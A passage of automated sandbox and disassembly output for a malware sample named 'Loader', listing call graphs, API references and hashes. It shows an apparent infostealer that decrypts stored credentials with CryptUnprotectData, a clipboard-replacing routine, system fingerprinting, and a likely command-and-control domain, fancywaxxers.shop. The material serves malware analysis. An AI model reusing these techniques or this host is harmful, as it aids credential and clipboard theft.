30471 439084 30469->30471 30472 438c79 SysAllocString 30469->30472 30470->30464 30471->30470 30475 438d30 30472->30475 30474->30458 30475->30475 30476 438d46 SysAllocString 30475->30476 30479 438d6e 30476->30479 30477 43906f SysFreeString SysFreeString 30477->30471 30478 439065 30478->30477 30479->30477 30479->30478 30480 438db2 VariantInit 30479->30480 30482 438e00 30480->30482 30481 439054 VariantClear 30481->30478 30482->30481 30281 40d45b 30282 40d470 30281->30282 30285 40d4be 30282->30285 30307 43d760 LdrInitializeThunk 30282->30307 30283 40d53e 30303 423190 30283->30303 30285->30283 30308 43d760 LdrInitializeThunk 30285->30308 30288 40d57d 30289 423a50 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 30288->30289 30290 40d59d 30289->30290 30291 423cf0 RtlExpandEnvironmentStrings RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 30290->30291 30292 40d5bd 30291->30292 30293 426270 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 30292->30293 30294 40d5e6 30293->30294 30295 426740 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 30294->30295 30296 40d5ef 30295->30296 30297 428fd0 RtlExpandEnvironmentStrings LdrInitializeThunk 30296->30297 30298 40d5f8 30297->30298 30299 428150 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings LdrInitializeThunk 30298->30299 30300 40d618 30299->30300 30301 432490 6 API calls 30300->30301 30302 40d641 30301->30302 30304 4231f0 30303->30304 30304->30304 30305 423219 RtlExpandEnvironmentStrings 30304->30305 30306 423260 30305->30306 30306->30306 30307->30285 30308->30283 30483 42ce22 30484 42ce2e GetComputerNameExA 30483->30484 30486 437b21 GetUserDefaultUILanguage 30487 437b56 30486->30487 30309 43e060 30310 43e090 30309->30310 30310->30310 30311 43e11e 30310->30311 30313 43d760 LdrInitializeThunk 30310->30313 30313->30311 30488 42b421 30489 42b450 30488->30489 30489->30489 30490 42b53e 30489->30490 30492 43d760 LdrInitializeThunk 30489->30492 30492->30490 30493 423e21 30494 423e2e 30493->30494 30497 43fa60 30494->30497 30498 43fa80 30497->30498 30499 43fabe 30498->30499 30507 43d760 LdrInitializeThunk 30498->30507 30500 43bb10 RtlAllocateHeap 30499->30500 30504 423e52 30499->30504 30502 43fb37 30500->30502 30506 43fb8f 30502->30506 30508 43d760 LdrInitializeThunk 30502->30508 30503 43bb30 RtlFreeHeap 30503->30504 30506->30503 30507->30499 30508->30506 30509 422a28 30510 422b4b 30509->30510 30511 422a26 30509->30511 30512 422a1d 30509->30512 30510->30512 30513 422e70 30510->30513 30514 422db0 30510->30514 30511->30509 30511->30510 30511->30512 30515 4230cb 30511->30515 30517 422970 30511->30517 30513->30512 30523 43d760 LdrInitializeThunk 30513->30523 30514->30512 30525 43d760 LdrInitializeThunk 30514->30525 30524 43d760 LdrInitializeThunk 30515->30524 30522 43d760 LdrInitializeThunk 30517->30522 30520 4230f0 30522->30512 30523->30513 30524->30520 30525->30512 30526 42002d 30527 4200a8 30526->30527 30530 414760 30527->30530 30529 42010f 30531 4147a0 30530->30531 30531->30531 30532 440810 LdrInitializeThunk 30531->30532 30533 41487c 30532->30533 30534 440810 LdrInitializeThunk 30533->30534 30535 414aab 30534->30535 30536 414b98 30535->30536 30539 43bb10 RtlAllocateHeap 30535->30539 30548 414abc 30535->30548 30552 414b4e 30535->30552 30556 414c30 30535->30556 30538 43bb30 RtlFreeHeap 30536->30538 30538->30548 30540 414acd 30539->30540 30540->30552 30567 43d760 LdrInitializeThunk 30540->30567 30541 41516b 30541->30541 30542 415133 30541->30542 30574 43d760 LdrInitializeThunk 30541->30574 30542->30529 30545 440810 LdrInitializeThunk 30545->30548 30548->30541 30548->30542 30548->30545 30551 440ba0 LdrInitializeThunk 30548->30551 30557 43bb60 30548->30557 30569 43bda0 LdrInitializeThunk 30548->30569 30570 43bfb0 LdrInitializeThunk 30548->30570 30571 43bf20 LdrInitializeThunk 30548->30571 30572 440af0 LdrInitializeThunk 30548->30572 30573 43d760 LdrInitializeThunk 30548->30573 30551->30548 30552->30536 30552->30548 30552->30556 30553 43d760 LdrInitializeThunk 30553->30556 30556->30548 30556->30553 30568 439460 RtlAllocateHeap RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 30556->30568 30558 43bb80 30557->30558 30560 43bbbe 30558->30560 30575 43d760 LdrInitializeThunk 30558->30575 30559 43bd71 30559->30548 30560->30559 30562 43bb10 RtlAllocateHeap 30560->30562 30564 43bc64 30562->30564 30563 43bb30 RtlFreeHeap 30563->30559 30566 43bcbe 30564->30566 30576 43d760 LdrInitializeThunk 30564->30576 30566->30563 30567->30552 30568->30556 30569->30548 30570->30548 30571->30548 30572->30548 30573->30548 30574->30542 30575->30560 30576->30566 30314 4086f0 30316 4086ff 30314->30316 30315 408a5e ExitProcess 30316->30315 30317 408714 GetCurrentProcessId GetCurrentThreadId 30316->30317 30318 408a50 30316->30318 30320 40873a 30317->30320 30321 40873e SHGetSpecialFolderPathW 30317->30321 30335 43d6e0 FreeLibrary 30318->30335 30320->30321 30322 408870 30321->30322 30322->30322 30331 43bb10 30322->30331 30324 4088c0 GetForegroundWindow 30326 408981 30324->30326 30327 408a47 30326->30327 30334 40cad0 CoInitializeEx 30326->30334 30327->30318 30336 43efb0 30331->30336 30333 43bb1a RtlAllocateHeap 30333->30324 30335->30315 30337 43efd0 30336->30337 30337->30333 30337->30337 30577 40a9b0 30580 40a9e0 30577->30580 30578 40ad04 30579 43bb30 RtlFreeHeap 30579->30578 30580->30578 30580->30579 30338 415270 30339 415290 30338->30339 30339->30339 30361 440810 30339->30361 30341 4153bd 30342 4153e5 30341->30342 30346 415403 30341->30346 30350 415602 30341->30350 30352 415692 30341->30352 30359 41544d 30341->30359 30365 440af0 LdrInitializeThunk 30341->30365 30366 440af0 LdrInitializeThunk 30342->30366 30345 4157bd 30351 415807 30345->30351 30355 415846 30345->30355 30345->30359 30373 440af0 LdrInitializeThunk 30345->30373 30346->30345 30346->30350 30346->30352 30346->30359 30367 440ba0 30346->30367 30350->30359 30375 43d760 LdrInitializeThunk 30350->30375 30354 440ba0 LdrInitializeThunk 30351->30354 30351->30355 30351->30359 30360 4158fe 30351->30360 30356 440810 LdrInitializeThunk 30352->30356 30354->30355 30355->30359 30355->30360 30374 43d760 LdrInitializeThunk 30355->30374 30356->30345 30358 415bb3 CryptUnprotectData 30358->30359 30358->30360 30359->30359 30360->30358 30360->30359 30362 440830 30361->30362 30363 44092e 30362->30363 30376 43d760 LdrInitializeThunk 30362->30376 30363->30341 30365->30342 30366->30346 30368 440bc0 30367->30368 30371 440bfe 30368->30371 30377 43d760 LdrInitializeThunk 30368->30377 30369 41543b 30369->30345 30369->30350 30369->30352 30369->30359 30371->30369 30378 43d760 LdrInitializeThunk 30371->30378 30373->30351 30374->30360 30375->30359 30376->30363 30377->30371 30378->30369 30581 43e232 30583 43e260 30581->30583 30582 43e2ee 30583->30582 30585 43d760 LdrInitializeThunk 30583->30585 30585->30582 30379 43e5f1 GetForegroundWindow 30383 43f900 30379->30383 30381 43e5ff GetForegroundWindow 30382 43e610 30381->30382 30384 43f910 30383->30384 30384->30381 30586 40dfbb 30587 40dfc1 30586->30587 30590 412120 30587->30590 30589 40dfca 30600 412139 30590->30600 30591 412140 30591->30589 30593 413e05 CreateThread 30593->30600 30594 43bb30 RtlFreeHeap 30594->30600 30595 41277b RtlExpandEnvironmentStrings 30595->30600 30596 412a7d RtlExpandEnvironmentStrings 30596->30600 30597 43d760 LdrInitializeThunk 30597->30600 30600->30591 30600->30593 30600->30594 30600->30595 30600->30596 30600->30597 30601 40ae90 RtlAllocateHeap RtlFreeHeap RtlReAllocateHeap 30600->30601 30602 440670 LdrInitializeThunk 30600->30602 30603 440cd0 LdrInitializeThunk 30600->30603 30601->30600 30602->30600 30603->30600 30604 2fd1000 30605 2fd1102 30604->30605 30606 2fd1012 30604->30606 30607 2fd103a OpenClipboard 30606->30607 30608 2fd1030 Sleep 30606->30608 30609 2fd10f9 GetClipboardSequenceNumber 30607->30609 30610 2fd104a GetClipboardData 30607->30610 30608->30606 30609->30606 30611 2fd105a GlobalLock 30610->30611 30612 2fd10f3 CloseClipboard 30610->30612 30611->30612 30613 2fd106b GlobalAlloc 30611->30613 30612->30609 30615 2fd109d GlobalLock 30613->30615 30616 2fd10e9 GlobalUnlock 30613->30616 30617 2fd10b0 30615->30617 30616->30612 30618 2fd10b9 GlobalUnlock 30617->30618 30619 2fd10cb EmptyClipboard SetClipboardData 30618->30619 30620 2fd10e0 GlobalFree 30618->30620 30619->30616 30619->30620 30620->30616
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: !$!$!$#$#$$$%$%$%$%$'$'$'$($($)$)$+$-$/$1$3$3$4$5$6$6$7$8$9$9$:$:$;$;$<$=$=$?$A$C$D$D$D$I$I$J$K$M$O$Q$Q$S$U$W$\$]$`$a$g$i$i$k$o$p$q$v$x$y${$}
                                                                                                  • API String ID: 0-2157806064
                                                                                                  • Opcode ID: 3de4518166a14f2ae89b5187a04fd900a9f2a3316777b08cad5282cdff0d505e
                                                                                                  • Instruction ID: 3de8b0e864d2495a0009815e94a66544eb6cb25ac5ea341fc1d881c2dc3f52c9
                                                                                                  • Opcode Fuzzy Hash: 3de4518166a14f2ae89b5187a04fd900a9f2a3316777b08cad5282cdff0d505e
                                                                                                  • Instruction Fuzzy Hash: 1713CE3150C7C18AD3349B3889453DFBFD1ABD6324F188A6EE4E9873D2D67889828757

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 457 438890-4388b5 458 4388c0-438908 457->458 458->458 459 43890a-438923 458->459 460 438930-438972 459->460 460->460 461 438974-4389b2 460->461 462 4389c0-4389d2 461->462 462->462 463 4389d4-4389f3 462->463 465 438b03-438b0f 463->465 466 4389f9-438a04 463->466 467 438b10-438b75 465->467 468 438a10-438a55 466->468 467->467 469 438b77-438bd7 CoCreateInstance 467->469 468->468 470 438a57-438a6f 468->470 471 4390a2-4390cb call 43f3e0 GetVolumeInformationW 469->471 472 438bdd-438c0f 469->472 473 438a70-438aed 470->473 479 4390d5-4390d7 471->479 480 4390cd-4390d1 471->480 476 438c10-438c24 472->476 473->473 475 438aef-438afc 473->475 475->465 476->476 478 438c26-438c53 SysAllocString 476->478 485 438c59-438c73 CoSetProxyBlanket 478->485 486 43908e-43909e SysFreeString 478->486 481 4390ed-4390f4 479->481 480->479 483 439100-439115 481->483 484 4390f6-4390fd 481->484 487 439120-439134 483->487 484->483 488 439084-43908a 485->488 489 438c79-438c8f 485->489 486->471 487->487 490 439136-439173 487->490 488->486 491 438c90-438cb5 489->491 492 439180-4391c8 490->492 491->491 493 438cb7-438d2f SysAllocString 491->493 492->492 494 4391ca-4391ff call 41da40 492->494 495 438d30-438d44 493->495 500 439200-439208 494->500 495->495 497 438d46-438d70 SysAllocString 495->497 501 438d76-438d98 497->501 502 43906f-439081 SysFreeString * 2 497->502 500->500 503 43920a-43920c 500->503 510 439065-43906b 501->510 511 438d9e-438da1 501->511 502->488 504 439212-439222 call 408130 503->504 505 4390e0-4390e7 503->505 504->505 505->481 508 439227-43922e 505->508 510->502 511->510 512 438da7-438dac 511->512 512->510 513 438db2-438dfa VariantInit 512->513 514 438e00-438e2a 513->514 514->514 515 438e2c-438e3e 514->515 516 438e42-438e44 515->516 517 439054-439061 VariantClear 516->517 518 438e4a-438e50 516->518 517->510 518->517 519 438e56-438e60 518->519 520 438ea3 519->520 521 438e62-438e67 519->521 522 438ea5-438ebd call 407fa0 520->522 523 438e7c-438e80 521->523 532 438ec3-438ecd 522->532 533 439006-439017 522->533 524 438e82-438e8d 523->524 525 438e70 523->525 527 438e96-438e9c 524->527 528 438e8f-438e94 524->528 530 438e71-438e7a 525->530 527->530 531 438e9e-438ea1 527->531 528->530 530->522 530->523 531->530 532->533 534 438ed3-438edb 532->534 535 439019 533->535 536 43901e-43902a 533->536 539 438ee0-438eed 534->539 535->536 537 439031-439051 call 407fd0 call 407fb0 536->537 538 43902c 536->538 537->517 538->537 541 438f00-438f06 539->541 542 438eef-438ef4 539->542 545 438f45-438f53 541->545 546 438f08-438f0b 541->546 544 438f27 542->544 547 438f2a-438f2e 544->547 549 438f55-438f58 545->549 550 438fba-438fc3 545->550 546->545 551 438f0d-438f24 546->551 552 438f30-438f36 547->552 549->550 554 438f5a-438fb5 549->554 555 438fc5-438fc8 550->555 556 438fcd-438fd0 550->556 551->544 552->533 557 438f3c-438f3e 552->557 554->547 555->552 558 438fd2-438ffa 556->558 559 438fff-439001 556->559 557->539 560 438f40 557->560 558->544 559->544 560->533
                                                                                                  APIs
                                                                                                  • CoCreateInstance.OLE32(0044268C,00000000,00000001,0044267C,00000000), ref: 00438BCC
                                                                                                  • SysAllocString.OLEAUT32(-X*^), ref: 00438C2B
                                                                                                  • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438C6B
                                                                                                  • SysAllocString.OLEAUT32(PX), ref: 00438CBC
                                                                                                  • SysAllocString.OLEAUT32(1FDB1DCF), ref: 00438D4B
                                                                                                  • VariantInit.OLEAUT32(CCCFCEE9), ref: 00438DB7
                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00439079
                                                                                                  • SysFreeString.OLEAUT32(?), ref: 0043907F
                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00439092
                                                                                                  • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004390C7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: String$AllocFree$BlanketCreateInformationInitInstanceProxyVariantVolume
                                                                                                  • String ID: #fw$,\)B$-X*^$2=$7$YdB3$adB3
                                                                                                  • API String ID: 2247799857-2780812687
                                                                                                  • Opcode ID: 493ce23e70961967b078ef07cc2cf3f32dcd47f251a9ce8c4d2505a1d3330aab
                                                                                                  • Instruction ID: fb0c433af6a3450d5babb11c9f329018bedb9ef95a219116fd7d3ff89bf2b34d
                                                                                                  • Opcode Fuzzy Hash: 493ce23e70961967b078ef07cc2cf3f32dcd47f251a9ce8c4d2505a1d3330aab
                                                                                                  • Instruction Fuzzy Hash: 3E42F175A083508BD714CF24C8407ABBBE2AFC9314F189A2DF5D59B391DBB9D806CB46

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 561 432620-432705 GetSystemMetrics * 2 567 43270c-432b96 561->567
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MetricsSystem
                                                                                                  • String ID: $-2C$27C$43C$A-C$Q0C$T2C$^8C$.C$6C
                                                                                                  • API String ID: 4116985748-1565625857
                                                                                                  • Opcode ID: 9a7bccb0269d965fd8bf19ed920815c7b018a74b71be457f30273063258454ec
                                                                                                  • Instruction ID: c4bc66bf91b4d2b79cba4133798209c934d4108bb079f107fafe31fe0a802b54
                                                                                                  • Opcode Fuzzy Hash: 9a7bccb0269d965fd8bf19ed920815c7b018a74b71be457f30273063258454ec
                                                                                                  • Instruction Fuzzy Hash: 77C16BB050D3858FE770DF15C9897CABBE4AB86708F11891EE6885B350CBB85549CF8B

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • Sleep.KERNELBASE(00000001), ref: 02FD1032
                                                                                                  • OpenClipboard.USER32(00000000), ref: 02FD103C
                                                                                                  • GetClipboardData.USER32(0000000D), ref: 02FD104C
                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 02FD105D
                                                                                                  • GlobalAlloc.KERNEL32(00000002,-00000004), ref: 02FD1090
                                                                                                  • GlobalLock.KERNEL32 ref: 02FD10A0
                                                                                                  • GlobalUnlock.KERNEL32 ref: 02FD10C1
                                                                                                  • EmptyClipboard.USER32 ref: 02FD10CB
                                                                                                  • SetClipboardData.USER32(0000000D), ref: 02FD10D6
                                                                                                  • GlobalFree.KERNEL32 ref: 02FD10E3
                                                                                                  • GlobalUnlock.KERNEL32(?), ref: 02FD10ED
                                                                                                  • CloseClipboard.USER32 ref: 02FD10F3
                                                                                                  • GetClipboardSequenceNumber.USER32 ref: 02FD10F9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921643201.0000000002FD1000.00000020.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921629166.0000000002FD0000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921657703.0000000002FD2000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_2fd0000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
                                                                                                  • String ID:
                                                                                                  • API String ID: 1416286485-0
                                                                                                  • Opcode ID: bd297c1f1aef93ec0241b280aa64dcbcc21e2876a440e3b881b4a74314724f0c
                                                                                                  • Instruction ID: 9879cee55ebdcabd45a8cd69c45d74b69e8017f157fef9e32f58e5751120d79d
                                                                                                  • Opcode Fuzzy Hash: bd297c1f1aef93ec0241b280aa64dcbcc21e2876a440e3b881b4a74314724f0c
                                                                                                  • Instruction Fuzzy Hash: D9218631E452549BD7213BB5AC0DB6BB7AAFF04BC5F484928FE49E6152E7218810CBE1

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 592 415270-41528a 593 415290-41529b 592->593 593->593 594 41529d-4152ab 593->594 595 4152b4 594->595 596 4152ad-4152b2 594->596 597 4152b7-415315 call 407fa0 595->597 596->597 600 415320-415347 597->600 600->600 601 415349-415355 600->601 602 415371-415381 601->602 603 415357-41535f 601->603 605 4153a1-4153c5 call 440810 602->605 606 415383-41538a 602->606 604 415360-41536f 603->604 604->602 604->604 610 415600 605->610 611 415602-41561f 605->611 612 4155e9 605->612 613 41544d-415454 605->613 614 41568c 605->614 615 4153cc 605->615 616 41540c-415415 605->616 617 4155ef-4155f5 call 407fb0 605->617 618 4153f0-415403 call 440af0 605->618 619 4153d2-4153e8 call 440af0 605->619 620 415692-41569b call 407fb0 605->620 621 4155f8-4155ff 605->621 622 4155da-4155e0 call 407fb0 605->622 623 41541c-415446 call 407fa0 call 440ba0 605->623 624 41569e-4156a6 605->624 607 415390-41539f 606->607 607->605 607->607 636 415620-415642 611->636 637 415460-415469 613->637 615->619 616->610 616->611 616->612 616->613 616->617 616->620 616->621 616->622 616->623 616->624 629 4157e2 616->629 630 4157e8-4157ee call 407fb0 616->630 631 4157cc 616->631 632 4157f1-41581a call 440af0 616->632 633 4157d2-4157d8 call 407fb0 616->633 634 4157db-4157dd 616->634 617->621 618->616 619->618 620->624 621->610 622->612 623->610 623->611 623->612 623->613 623->617 623->620 623->621 623->622 623->624 623->629 623->630 623->631 623->632 623->633 623->634 639 4156a8-4156ad 624->639 640 4156af 624->640 630->632 665 415821-41584e call 407fa0 call 440ba0 632->665 666 415890-4158af 632->666 667 415855 632->667 668 415a05-415a07 632->668 669 415887-41588d call 407fb0 632->669 670 415866-41587a call 401000 632->670 671 415bdd 632->671 672 415bef-415c59 632->672 633->634 647 4195c7-4195d0 634->647 636->636 648 415644-415650 636->648 637->637 650 41546b-415476 637->650 653 4156b2-415713 call 407fa0 639->653 640->653 648->614 656 415652-415661 648->656 658 415478-41547d 650->658 659 41547f 650->659 683 415720-415742 653->683 663 415670-415677 656->663 664 415482-4154ff call 407fa0 658->664 659->664 676 415680-415686 663->676 677 415679-41567c 663->677 699 415500-415559 664->699 665->666 665->667 665->668 665->669 665->670 665->671 665->672 675 4158b0-4158d2 666->675 667->670 680 415a10-415a16 668->680 669->666 670->669 681 415c60-415c97 672->681 675->675 686 4158d4-4158dc 675->686 676->614 688 415e0b-415e1a call 43d760 676->688 677->663 687 41567e 677->687 680->680 691 415a18-415a29 680->691 681->681 692 415c99-415cc3 call 401da0 681->692 683->683 684 415744-415752 683->684 694 415771-415781 684->694 695 415754-415759 684->695 697 41591a-415983 call 401a60 686->697 698 4158de-4158ef 686->698 687->614 727 415e23 688->727 701 415a30 691->701 702 415a2b-415a2e 691->702 692->668 692->671 692->672 723 415be3-415bec call 407fb0 692->723 724 415f26-415f3f call 43f3e0 692->724 725 415cf8-415d02 692->725 726 415f1d-415f23 call 407fb0 692->726 706 4157a1-4157c5 call 440810 694->706 707 415783-41578a 694->707 704 415760-41576f 695->704 731 415990-4159dc 697->731 708 4158f0-4158f7 698->708 699->699 710 41555b-41556b 699->710 712 415a31-415a3d 701->712 702->701 702->712 704->694 704->704 706->629 706->630 706->631 706->632 706->633 706->634 706->665 706->666 706->667 706->669 706->670 714 415790-41579f 707->714 716 415900-415906 708->716 717 4158f9-4158fc 708->717 719 415591-4155a5 710->719 720 41556d-415572 710->720 721 415a44 712->721 722 415a3f-415a42 712->722 714->706 714->714 716->697 730 415908-415917 call 43d760 716->730 717->708 729 4158fe 717->729 737 4155c1-4155d4 call 408d20 719->737 738 4155a7-4155af 719->738 735 415580-41558f 720->735 736 415a45-415a63 call 407fa0 721->736 722->721 722->736 723->672 724->647 739 415d10-415d19 725->739 726->724 741 415e26-415e63 call 407fa0 727->741 729->697 730->697 731->731 743 4159de-4159fe call 401da0 731->743 735->719 735->735 756 415b77-415bd6 call 43f3e0 CryptUnprotectData 736->756 757 415a69-415a6d 736->757 737->622 748 4155b0-4155bf 738->748 739->739 749 415d1b-415d1e 739->749 762 415e70-415eab 741->762 743->668 743->671 743->672 743->725 748->737 748->748 749->727 755 415d24-415d29 749->755 755->741 756->671 756->672 756->723 756->724 756->725 756->726 761 415a97-415ae6 call 41cf00 * 2 757->761 777 415a80-415a91 761->777 778 415ae8-415aff call 41cf00 761->778 762->762 765 415ead-415eb9 762->765 768 415ed1-415ee1 765->768 769 415ebb-415ebe 765->769 772 415f01-415f17 call 408d20 768->772 773 415ee3-415eea 768->773 771 415ec0-415ecf 769->771 771->768 771->771 772->726 775 415ef0-415eff 773->775 775->772 775->775 777->756 777->761 778->777 782 415b05-415b2e 778->782 782->777 783 415b34-415b49 call 41cf00 782->783 786 415a6f-415a73 783->786 787 415b4f-415b72 783->787 786->777 787->786
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: U3W$" &$'2/B$)I&K$+E%G$XY$y
                                                                                                  • API String ID: 0-81430434
                                                                                                  • Opcode ID: 2a785b569511994cfe81ee56b85ae98a7e96026a29b10a024a8f20330c530cc2
                                                                                                  • Instruction ID: 05021e0a9b25c4132836ee91ec2cccbdede4ee658622d0df3edd9005f2d7ce8f
                                                                                                  • Opcode Fuzzy Hash: 2a785b569511994cfe81ee56b85ae98a7e96026a29b10a024a8f20330c530cc2
                                                                                                  • Instruction Fuzzy Hash: 015214B5908741CFD720CF14D8857EBB7A1EFD5314F184A2EE4899B392E7389841CB9A

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 788 4224ed-4224fd 789 422597-42262b 788->789 790 422504 788->790 791 42250a-42252f 788->791 792 422630-42265b 789->792 790->791 793 422530-422555 791->793 792->792 794 42265d-422672 792->794 793->793 795 422557-42255e 793->795 796 422680-4226a0 794->796 797 422976-422999 795->797 798 422564-422573 795->798 796->796 800 4226a2-4226c7 796->800 801 4229a0-4229c5 797->801 799 422580-422587 798->799 802 42293f-422945 799->802 803 42258d-422590 799->803 804 4226d0-4226e4 800->804 801->801 805 4229c7-4229d6 801->805 802->797 806 422947-42296b call 43d760 802->806 803->799 807 422592 803->807 804->804 808 4226e6-4226f4 804->808 809 422970 805->809 810 4229d8-4229da 805->810 806->797 807->797 812 4226f6-4226fa 808->812 813 42270b-422713 808->813 809->797 814 4229e0-4229e7 810->814 816 422700-422709 812->816 819 422715-422716 813->819 820 42272b-422734 813->820 817 4229f0-4229f6 814->817 818 4229e9-4229ec 814->818 816->813 816->816 817->809 824 4229fc-422a18 call 43d760 817->824 818->814 823 4229ee 818->823 825 422720-422729 819->825 821 422736-42273a 820->821 822 42274b-422757 820->822 826 422740-422749 821->826 827 422771-42277b 822->827 828 422759-42275b 822->828 823->809 830 422a1d 824->830 825->820 825->825 826->822 826->826 832 42279b-42287f 827->832 833 42277d-422781 827->833 831 422760-42276d 828->831 837 422a46-422a54 830->837 831->831 834 42276f 831->834 836 422880-4228c5 832->836 835 422790-422799 833->835 834->827 835->832 835->835 836->836 838 4228c7-4228e8 836->838 840 4228f0-422912 838->840 840->840 841 422914-42293a call 40b570 840->841 841->837
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 3@8F$8==3$GD$Y$fancywaxxers.shop$l&?2$|L,B$_$|b
                                                                                                  • API String ID: 0-935190559
                                                                                                  • Opcode ID: 423b46a633b80c103a4ea6fee090211b61fb72b7d26b0ba6769946676044fa8e
                                                                                                  • Instruction ID: 5fde230e024abcefded984e0f9f8708b11b29ffe5adda8a0fcabaa82b8d26408
                                                                                                  • Opcode Fuzzy Hash: 423b46a633b80c103a4ea6fee090211b61fb72b7d26b0ba6769946676044fa8e
                                                                                                  • Instruction Fuzzy Hash: E9D133B460C3909FE314CF24A99176BBBE1EFD2300F54896DE4D49B391D7B98805CB56

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 869 40d6c5-40d6ef call 409710 CoUninitialize 872 40d6f0-40d727 869->872 872->872 873 40d729-40d739 872->873 874 40d740-40d754 873->874 874->874 875 40d756-40d7b3 874->875 876 40d7c0-40d7da 875->876 876->876 877 40d7dc-40d7ed 876->877 878 40d80b-40d813 877->878 879 40d7ef-40d7f6 877->879 881 40d815-40d816 878->881 882 40d82b-40d835 878->882 880 40d800-40d809 879->880 880->878 880->880 883 40d820-40d829 881->883 884 40d837-40d83b 882->884 885 40d84b-40d853 882->885 883->882 883->883 886 40d840-40d849 884->886 887 40d855-40d856 885->887 888 40d86b-40d875 885->888 886->885 886->886 889 40d860-40d869 887->889 890 40d877-40d87b 888->890 891 40d88b-40d897 888->891 889->888 889->889 892 40d880-40d889 890->892 893 40d8b1-40d9d4 891->893 894 40d899-40d89b 891->894 892->891 892->892 896 40d9e0-40da02 893->896 895 40d8a0-40d8ad 894->895 895->895 897 40d8af 895->897 896->896 898 40da04-40da1f 896->898 897->893 899 40da20-40da90 898->899 899->899 900 40da92-40db03 call 40b570 call 409710 CoUninitialize 899->900 905 40db10-40db47 900->905 905->905 906 40db49-40db59 905->906 907 40db60-40db74 906->907 907->907 908 40db76-40dbd3 907->908 909 40dbe0-40dbfa 908->909 909->909 910 40dbfc-40dc0d 909->910 911 40dc2b-40dc33 910->911 912 40dc0f-40dc16 910->912 914 40dc35-40dc36 911->914 915 40dc4b-40dc55 911->915 913 40dc20-40dc29 912->913 913->911 913->913 916 40dc40-40dc49 914->916 917 40dc57 915->917 918 40dc6b-40dc73 915->918 916->915 916->916 919 40dc60-40dc69 917->919 920 40dc75-40dc76 918->920 921 40dc8b-40dc95 918->921 919->918 919->919 922 40dc80-40dc89 920->922 923 40dc97-40dc9b 921->923 924 40dcab-40dcb7 921->924 922->921 922->922 927 40dca0-40dca9 923->927 925 40dcd1-40de02 924->925 926 40dcb9-40dcbb 924->926 929 40de10-40de31 925->929 928 40dcc0-40dccd 926->928 927->924 927->927 928->928 930 40dccf 928->930 929->929 931 40de33-40de52 929->931 930->925 932 40de60-40ded1 931->932 932->932 933 40ded3-40defd call 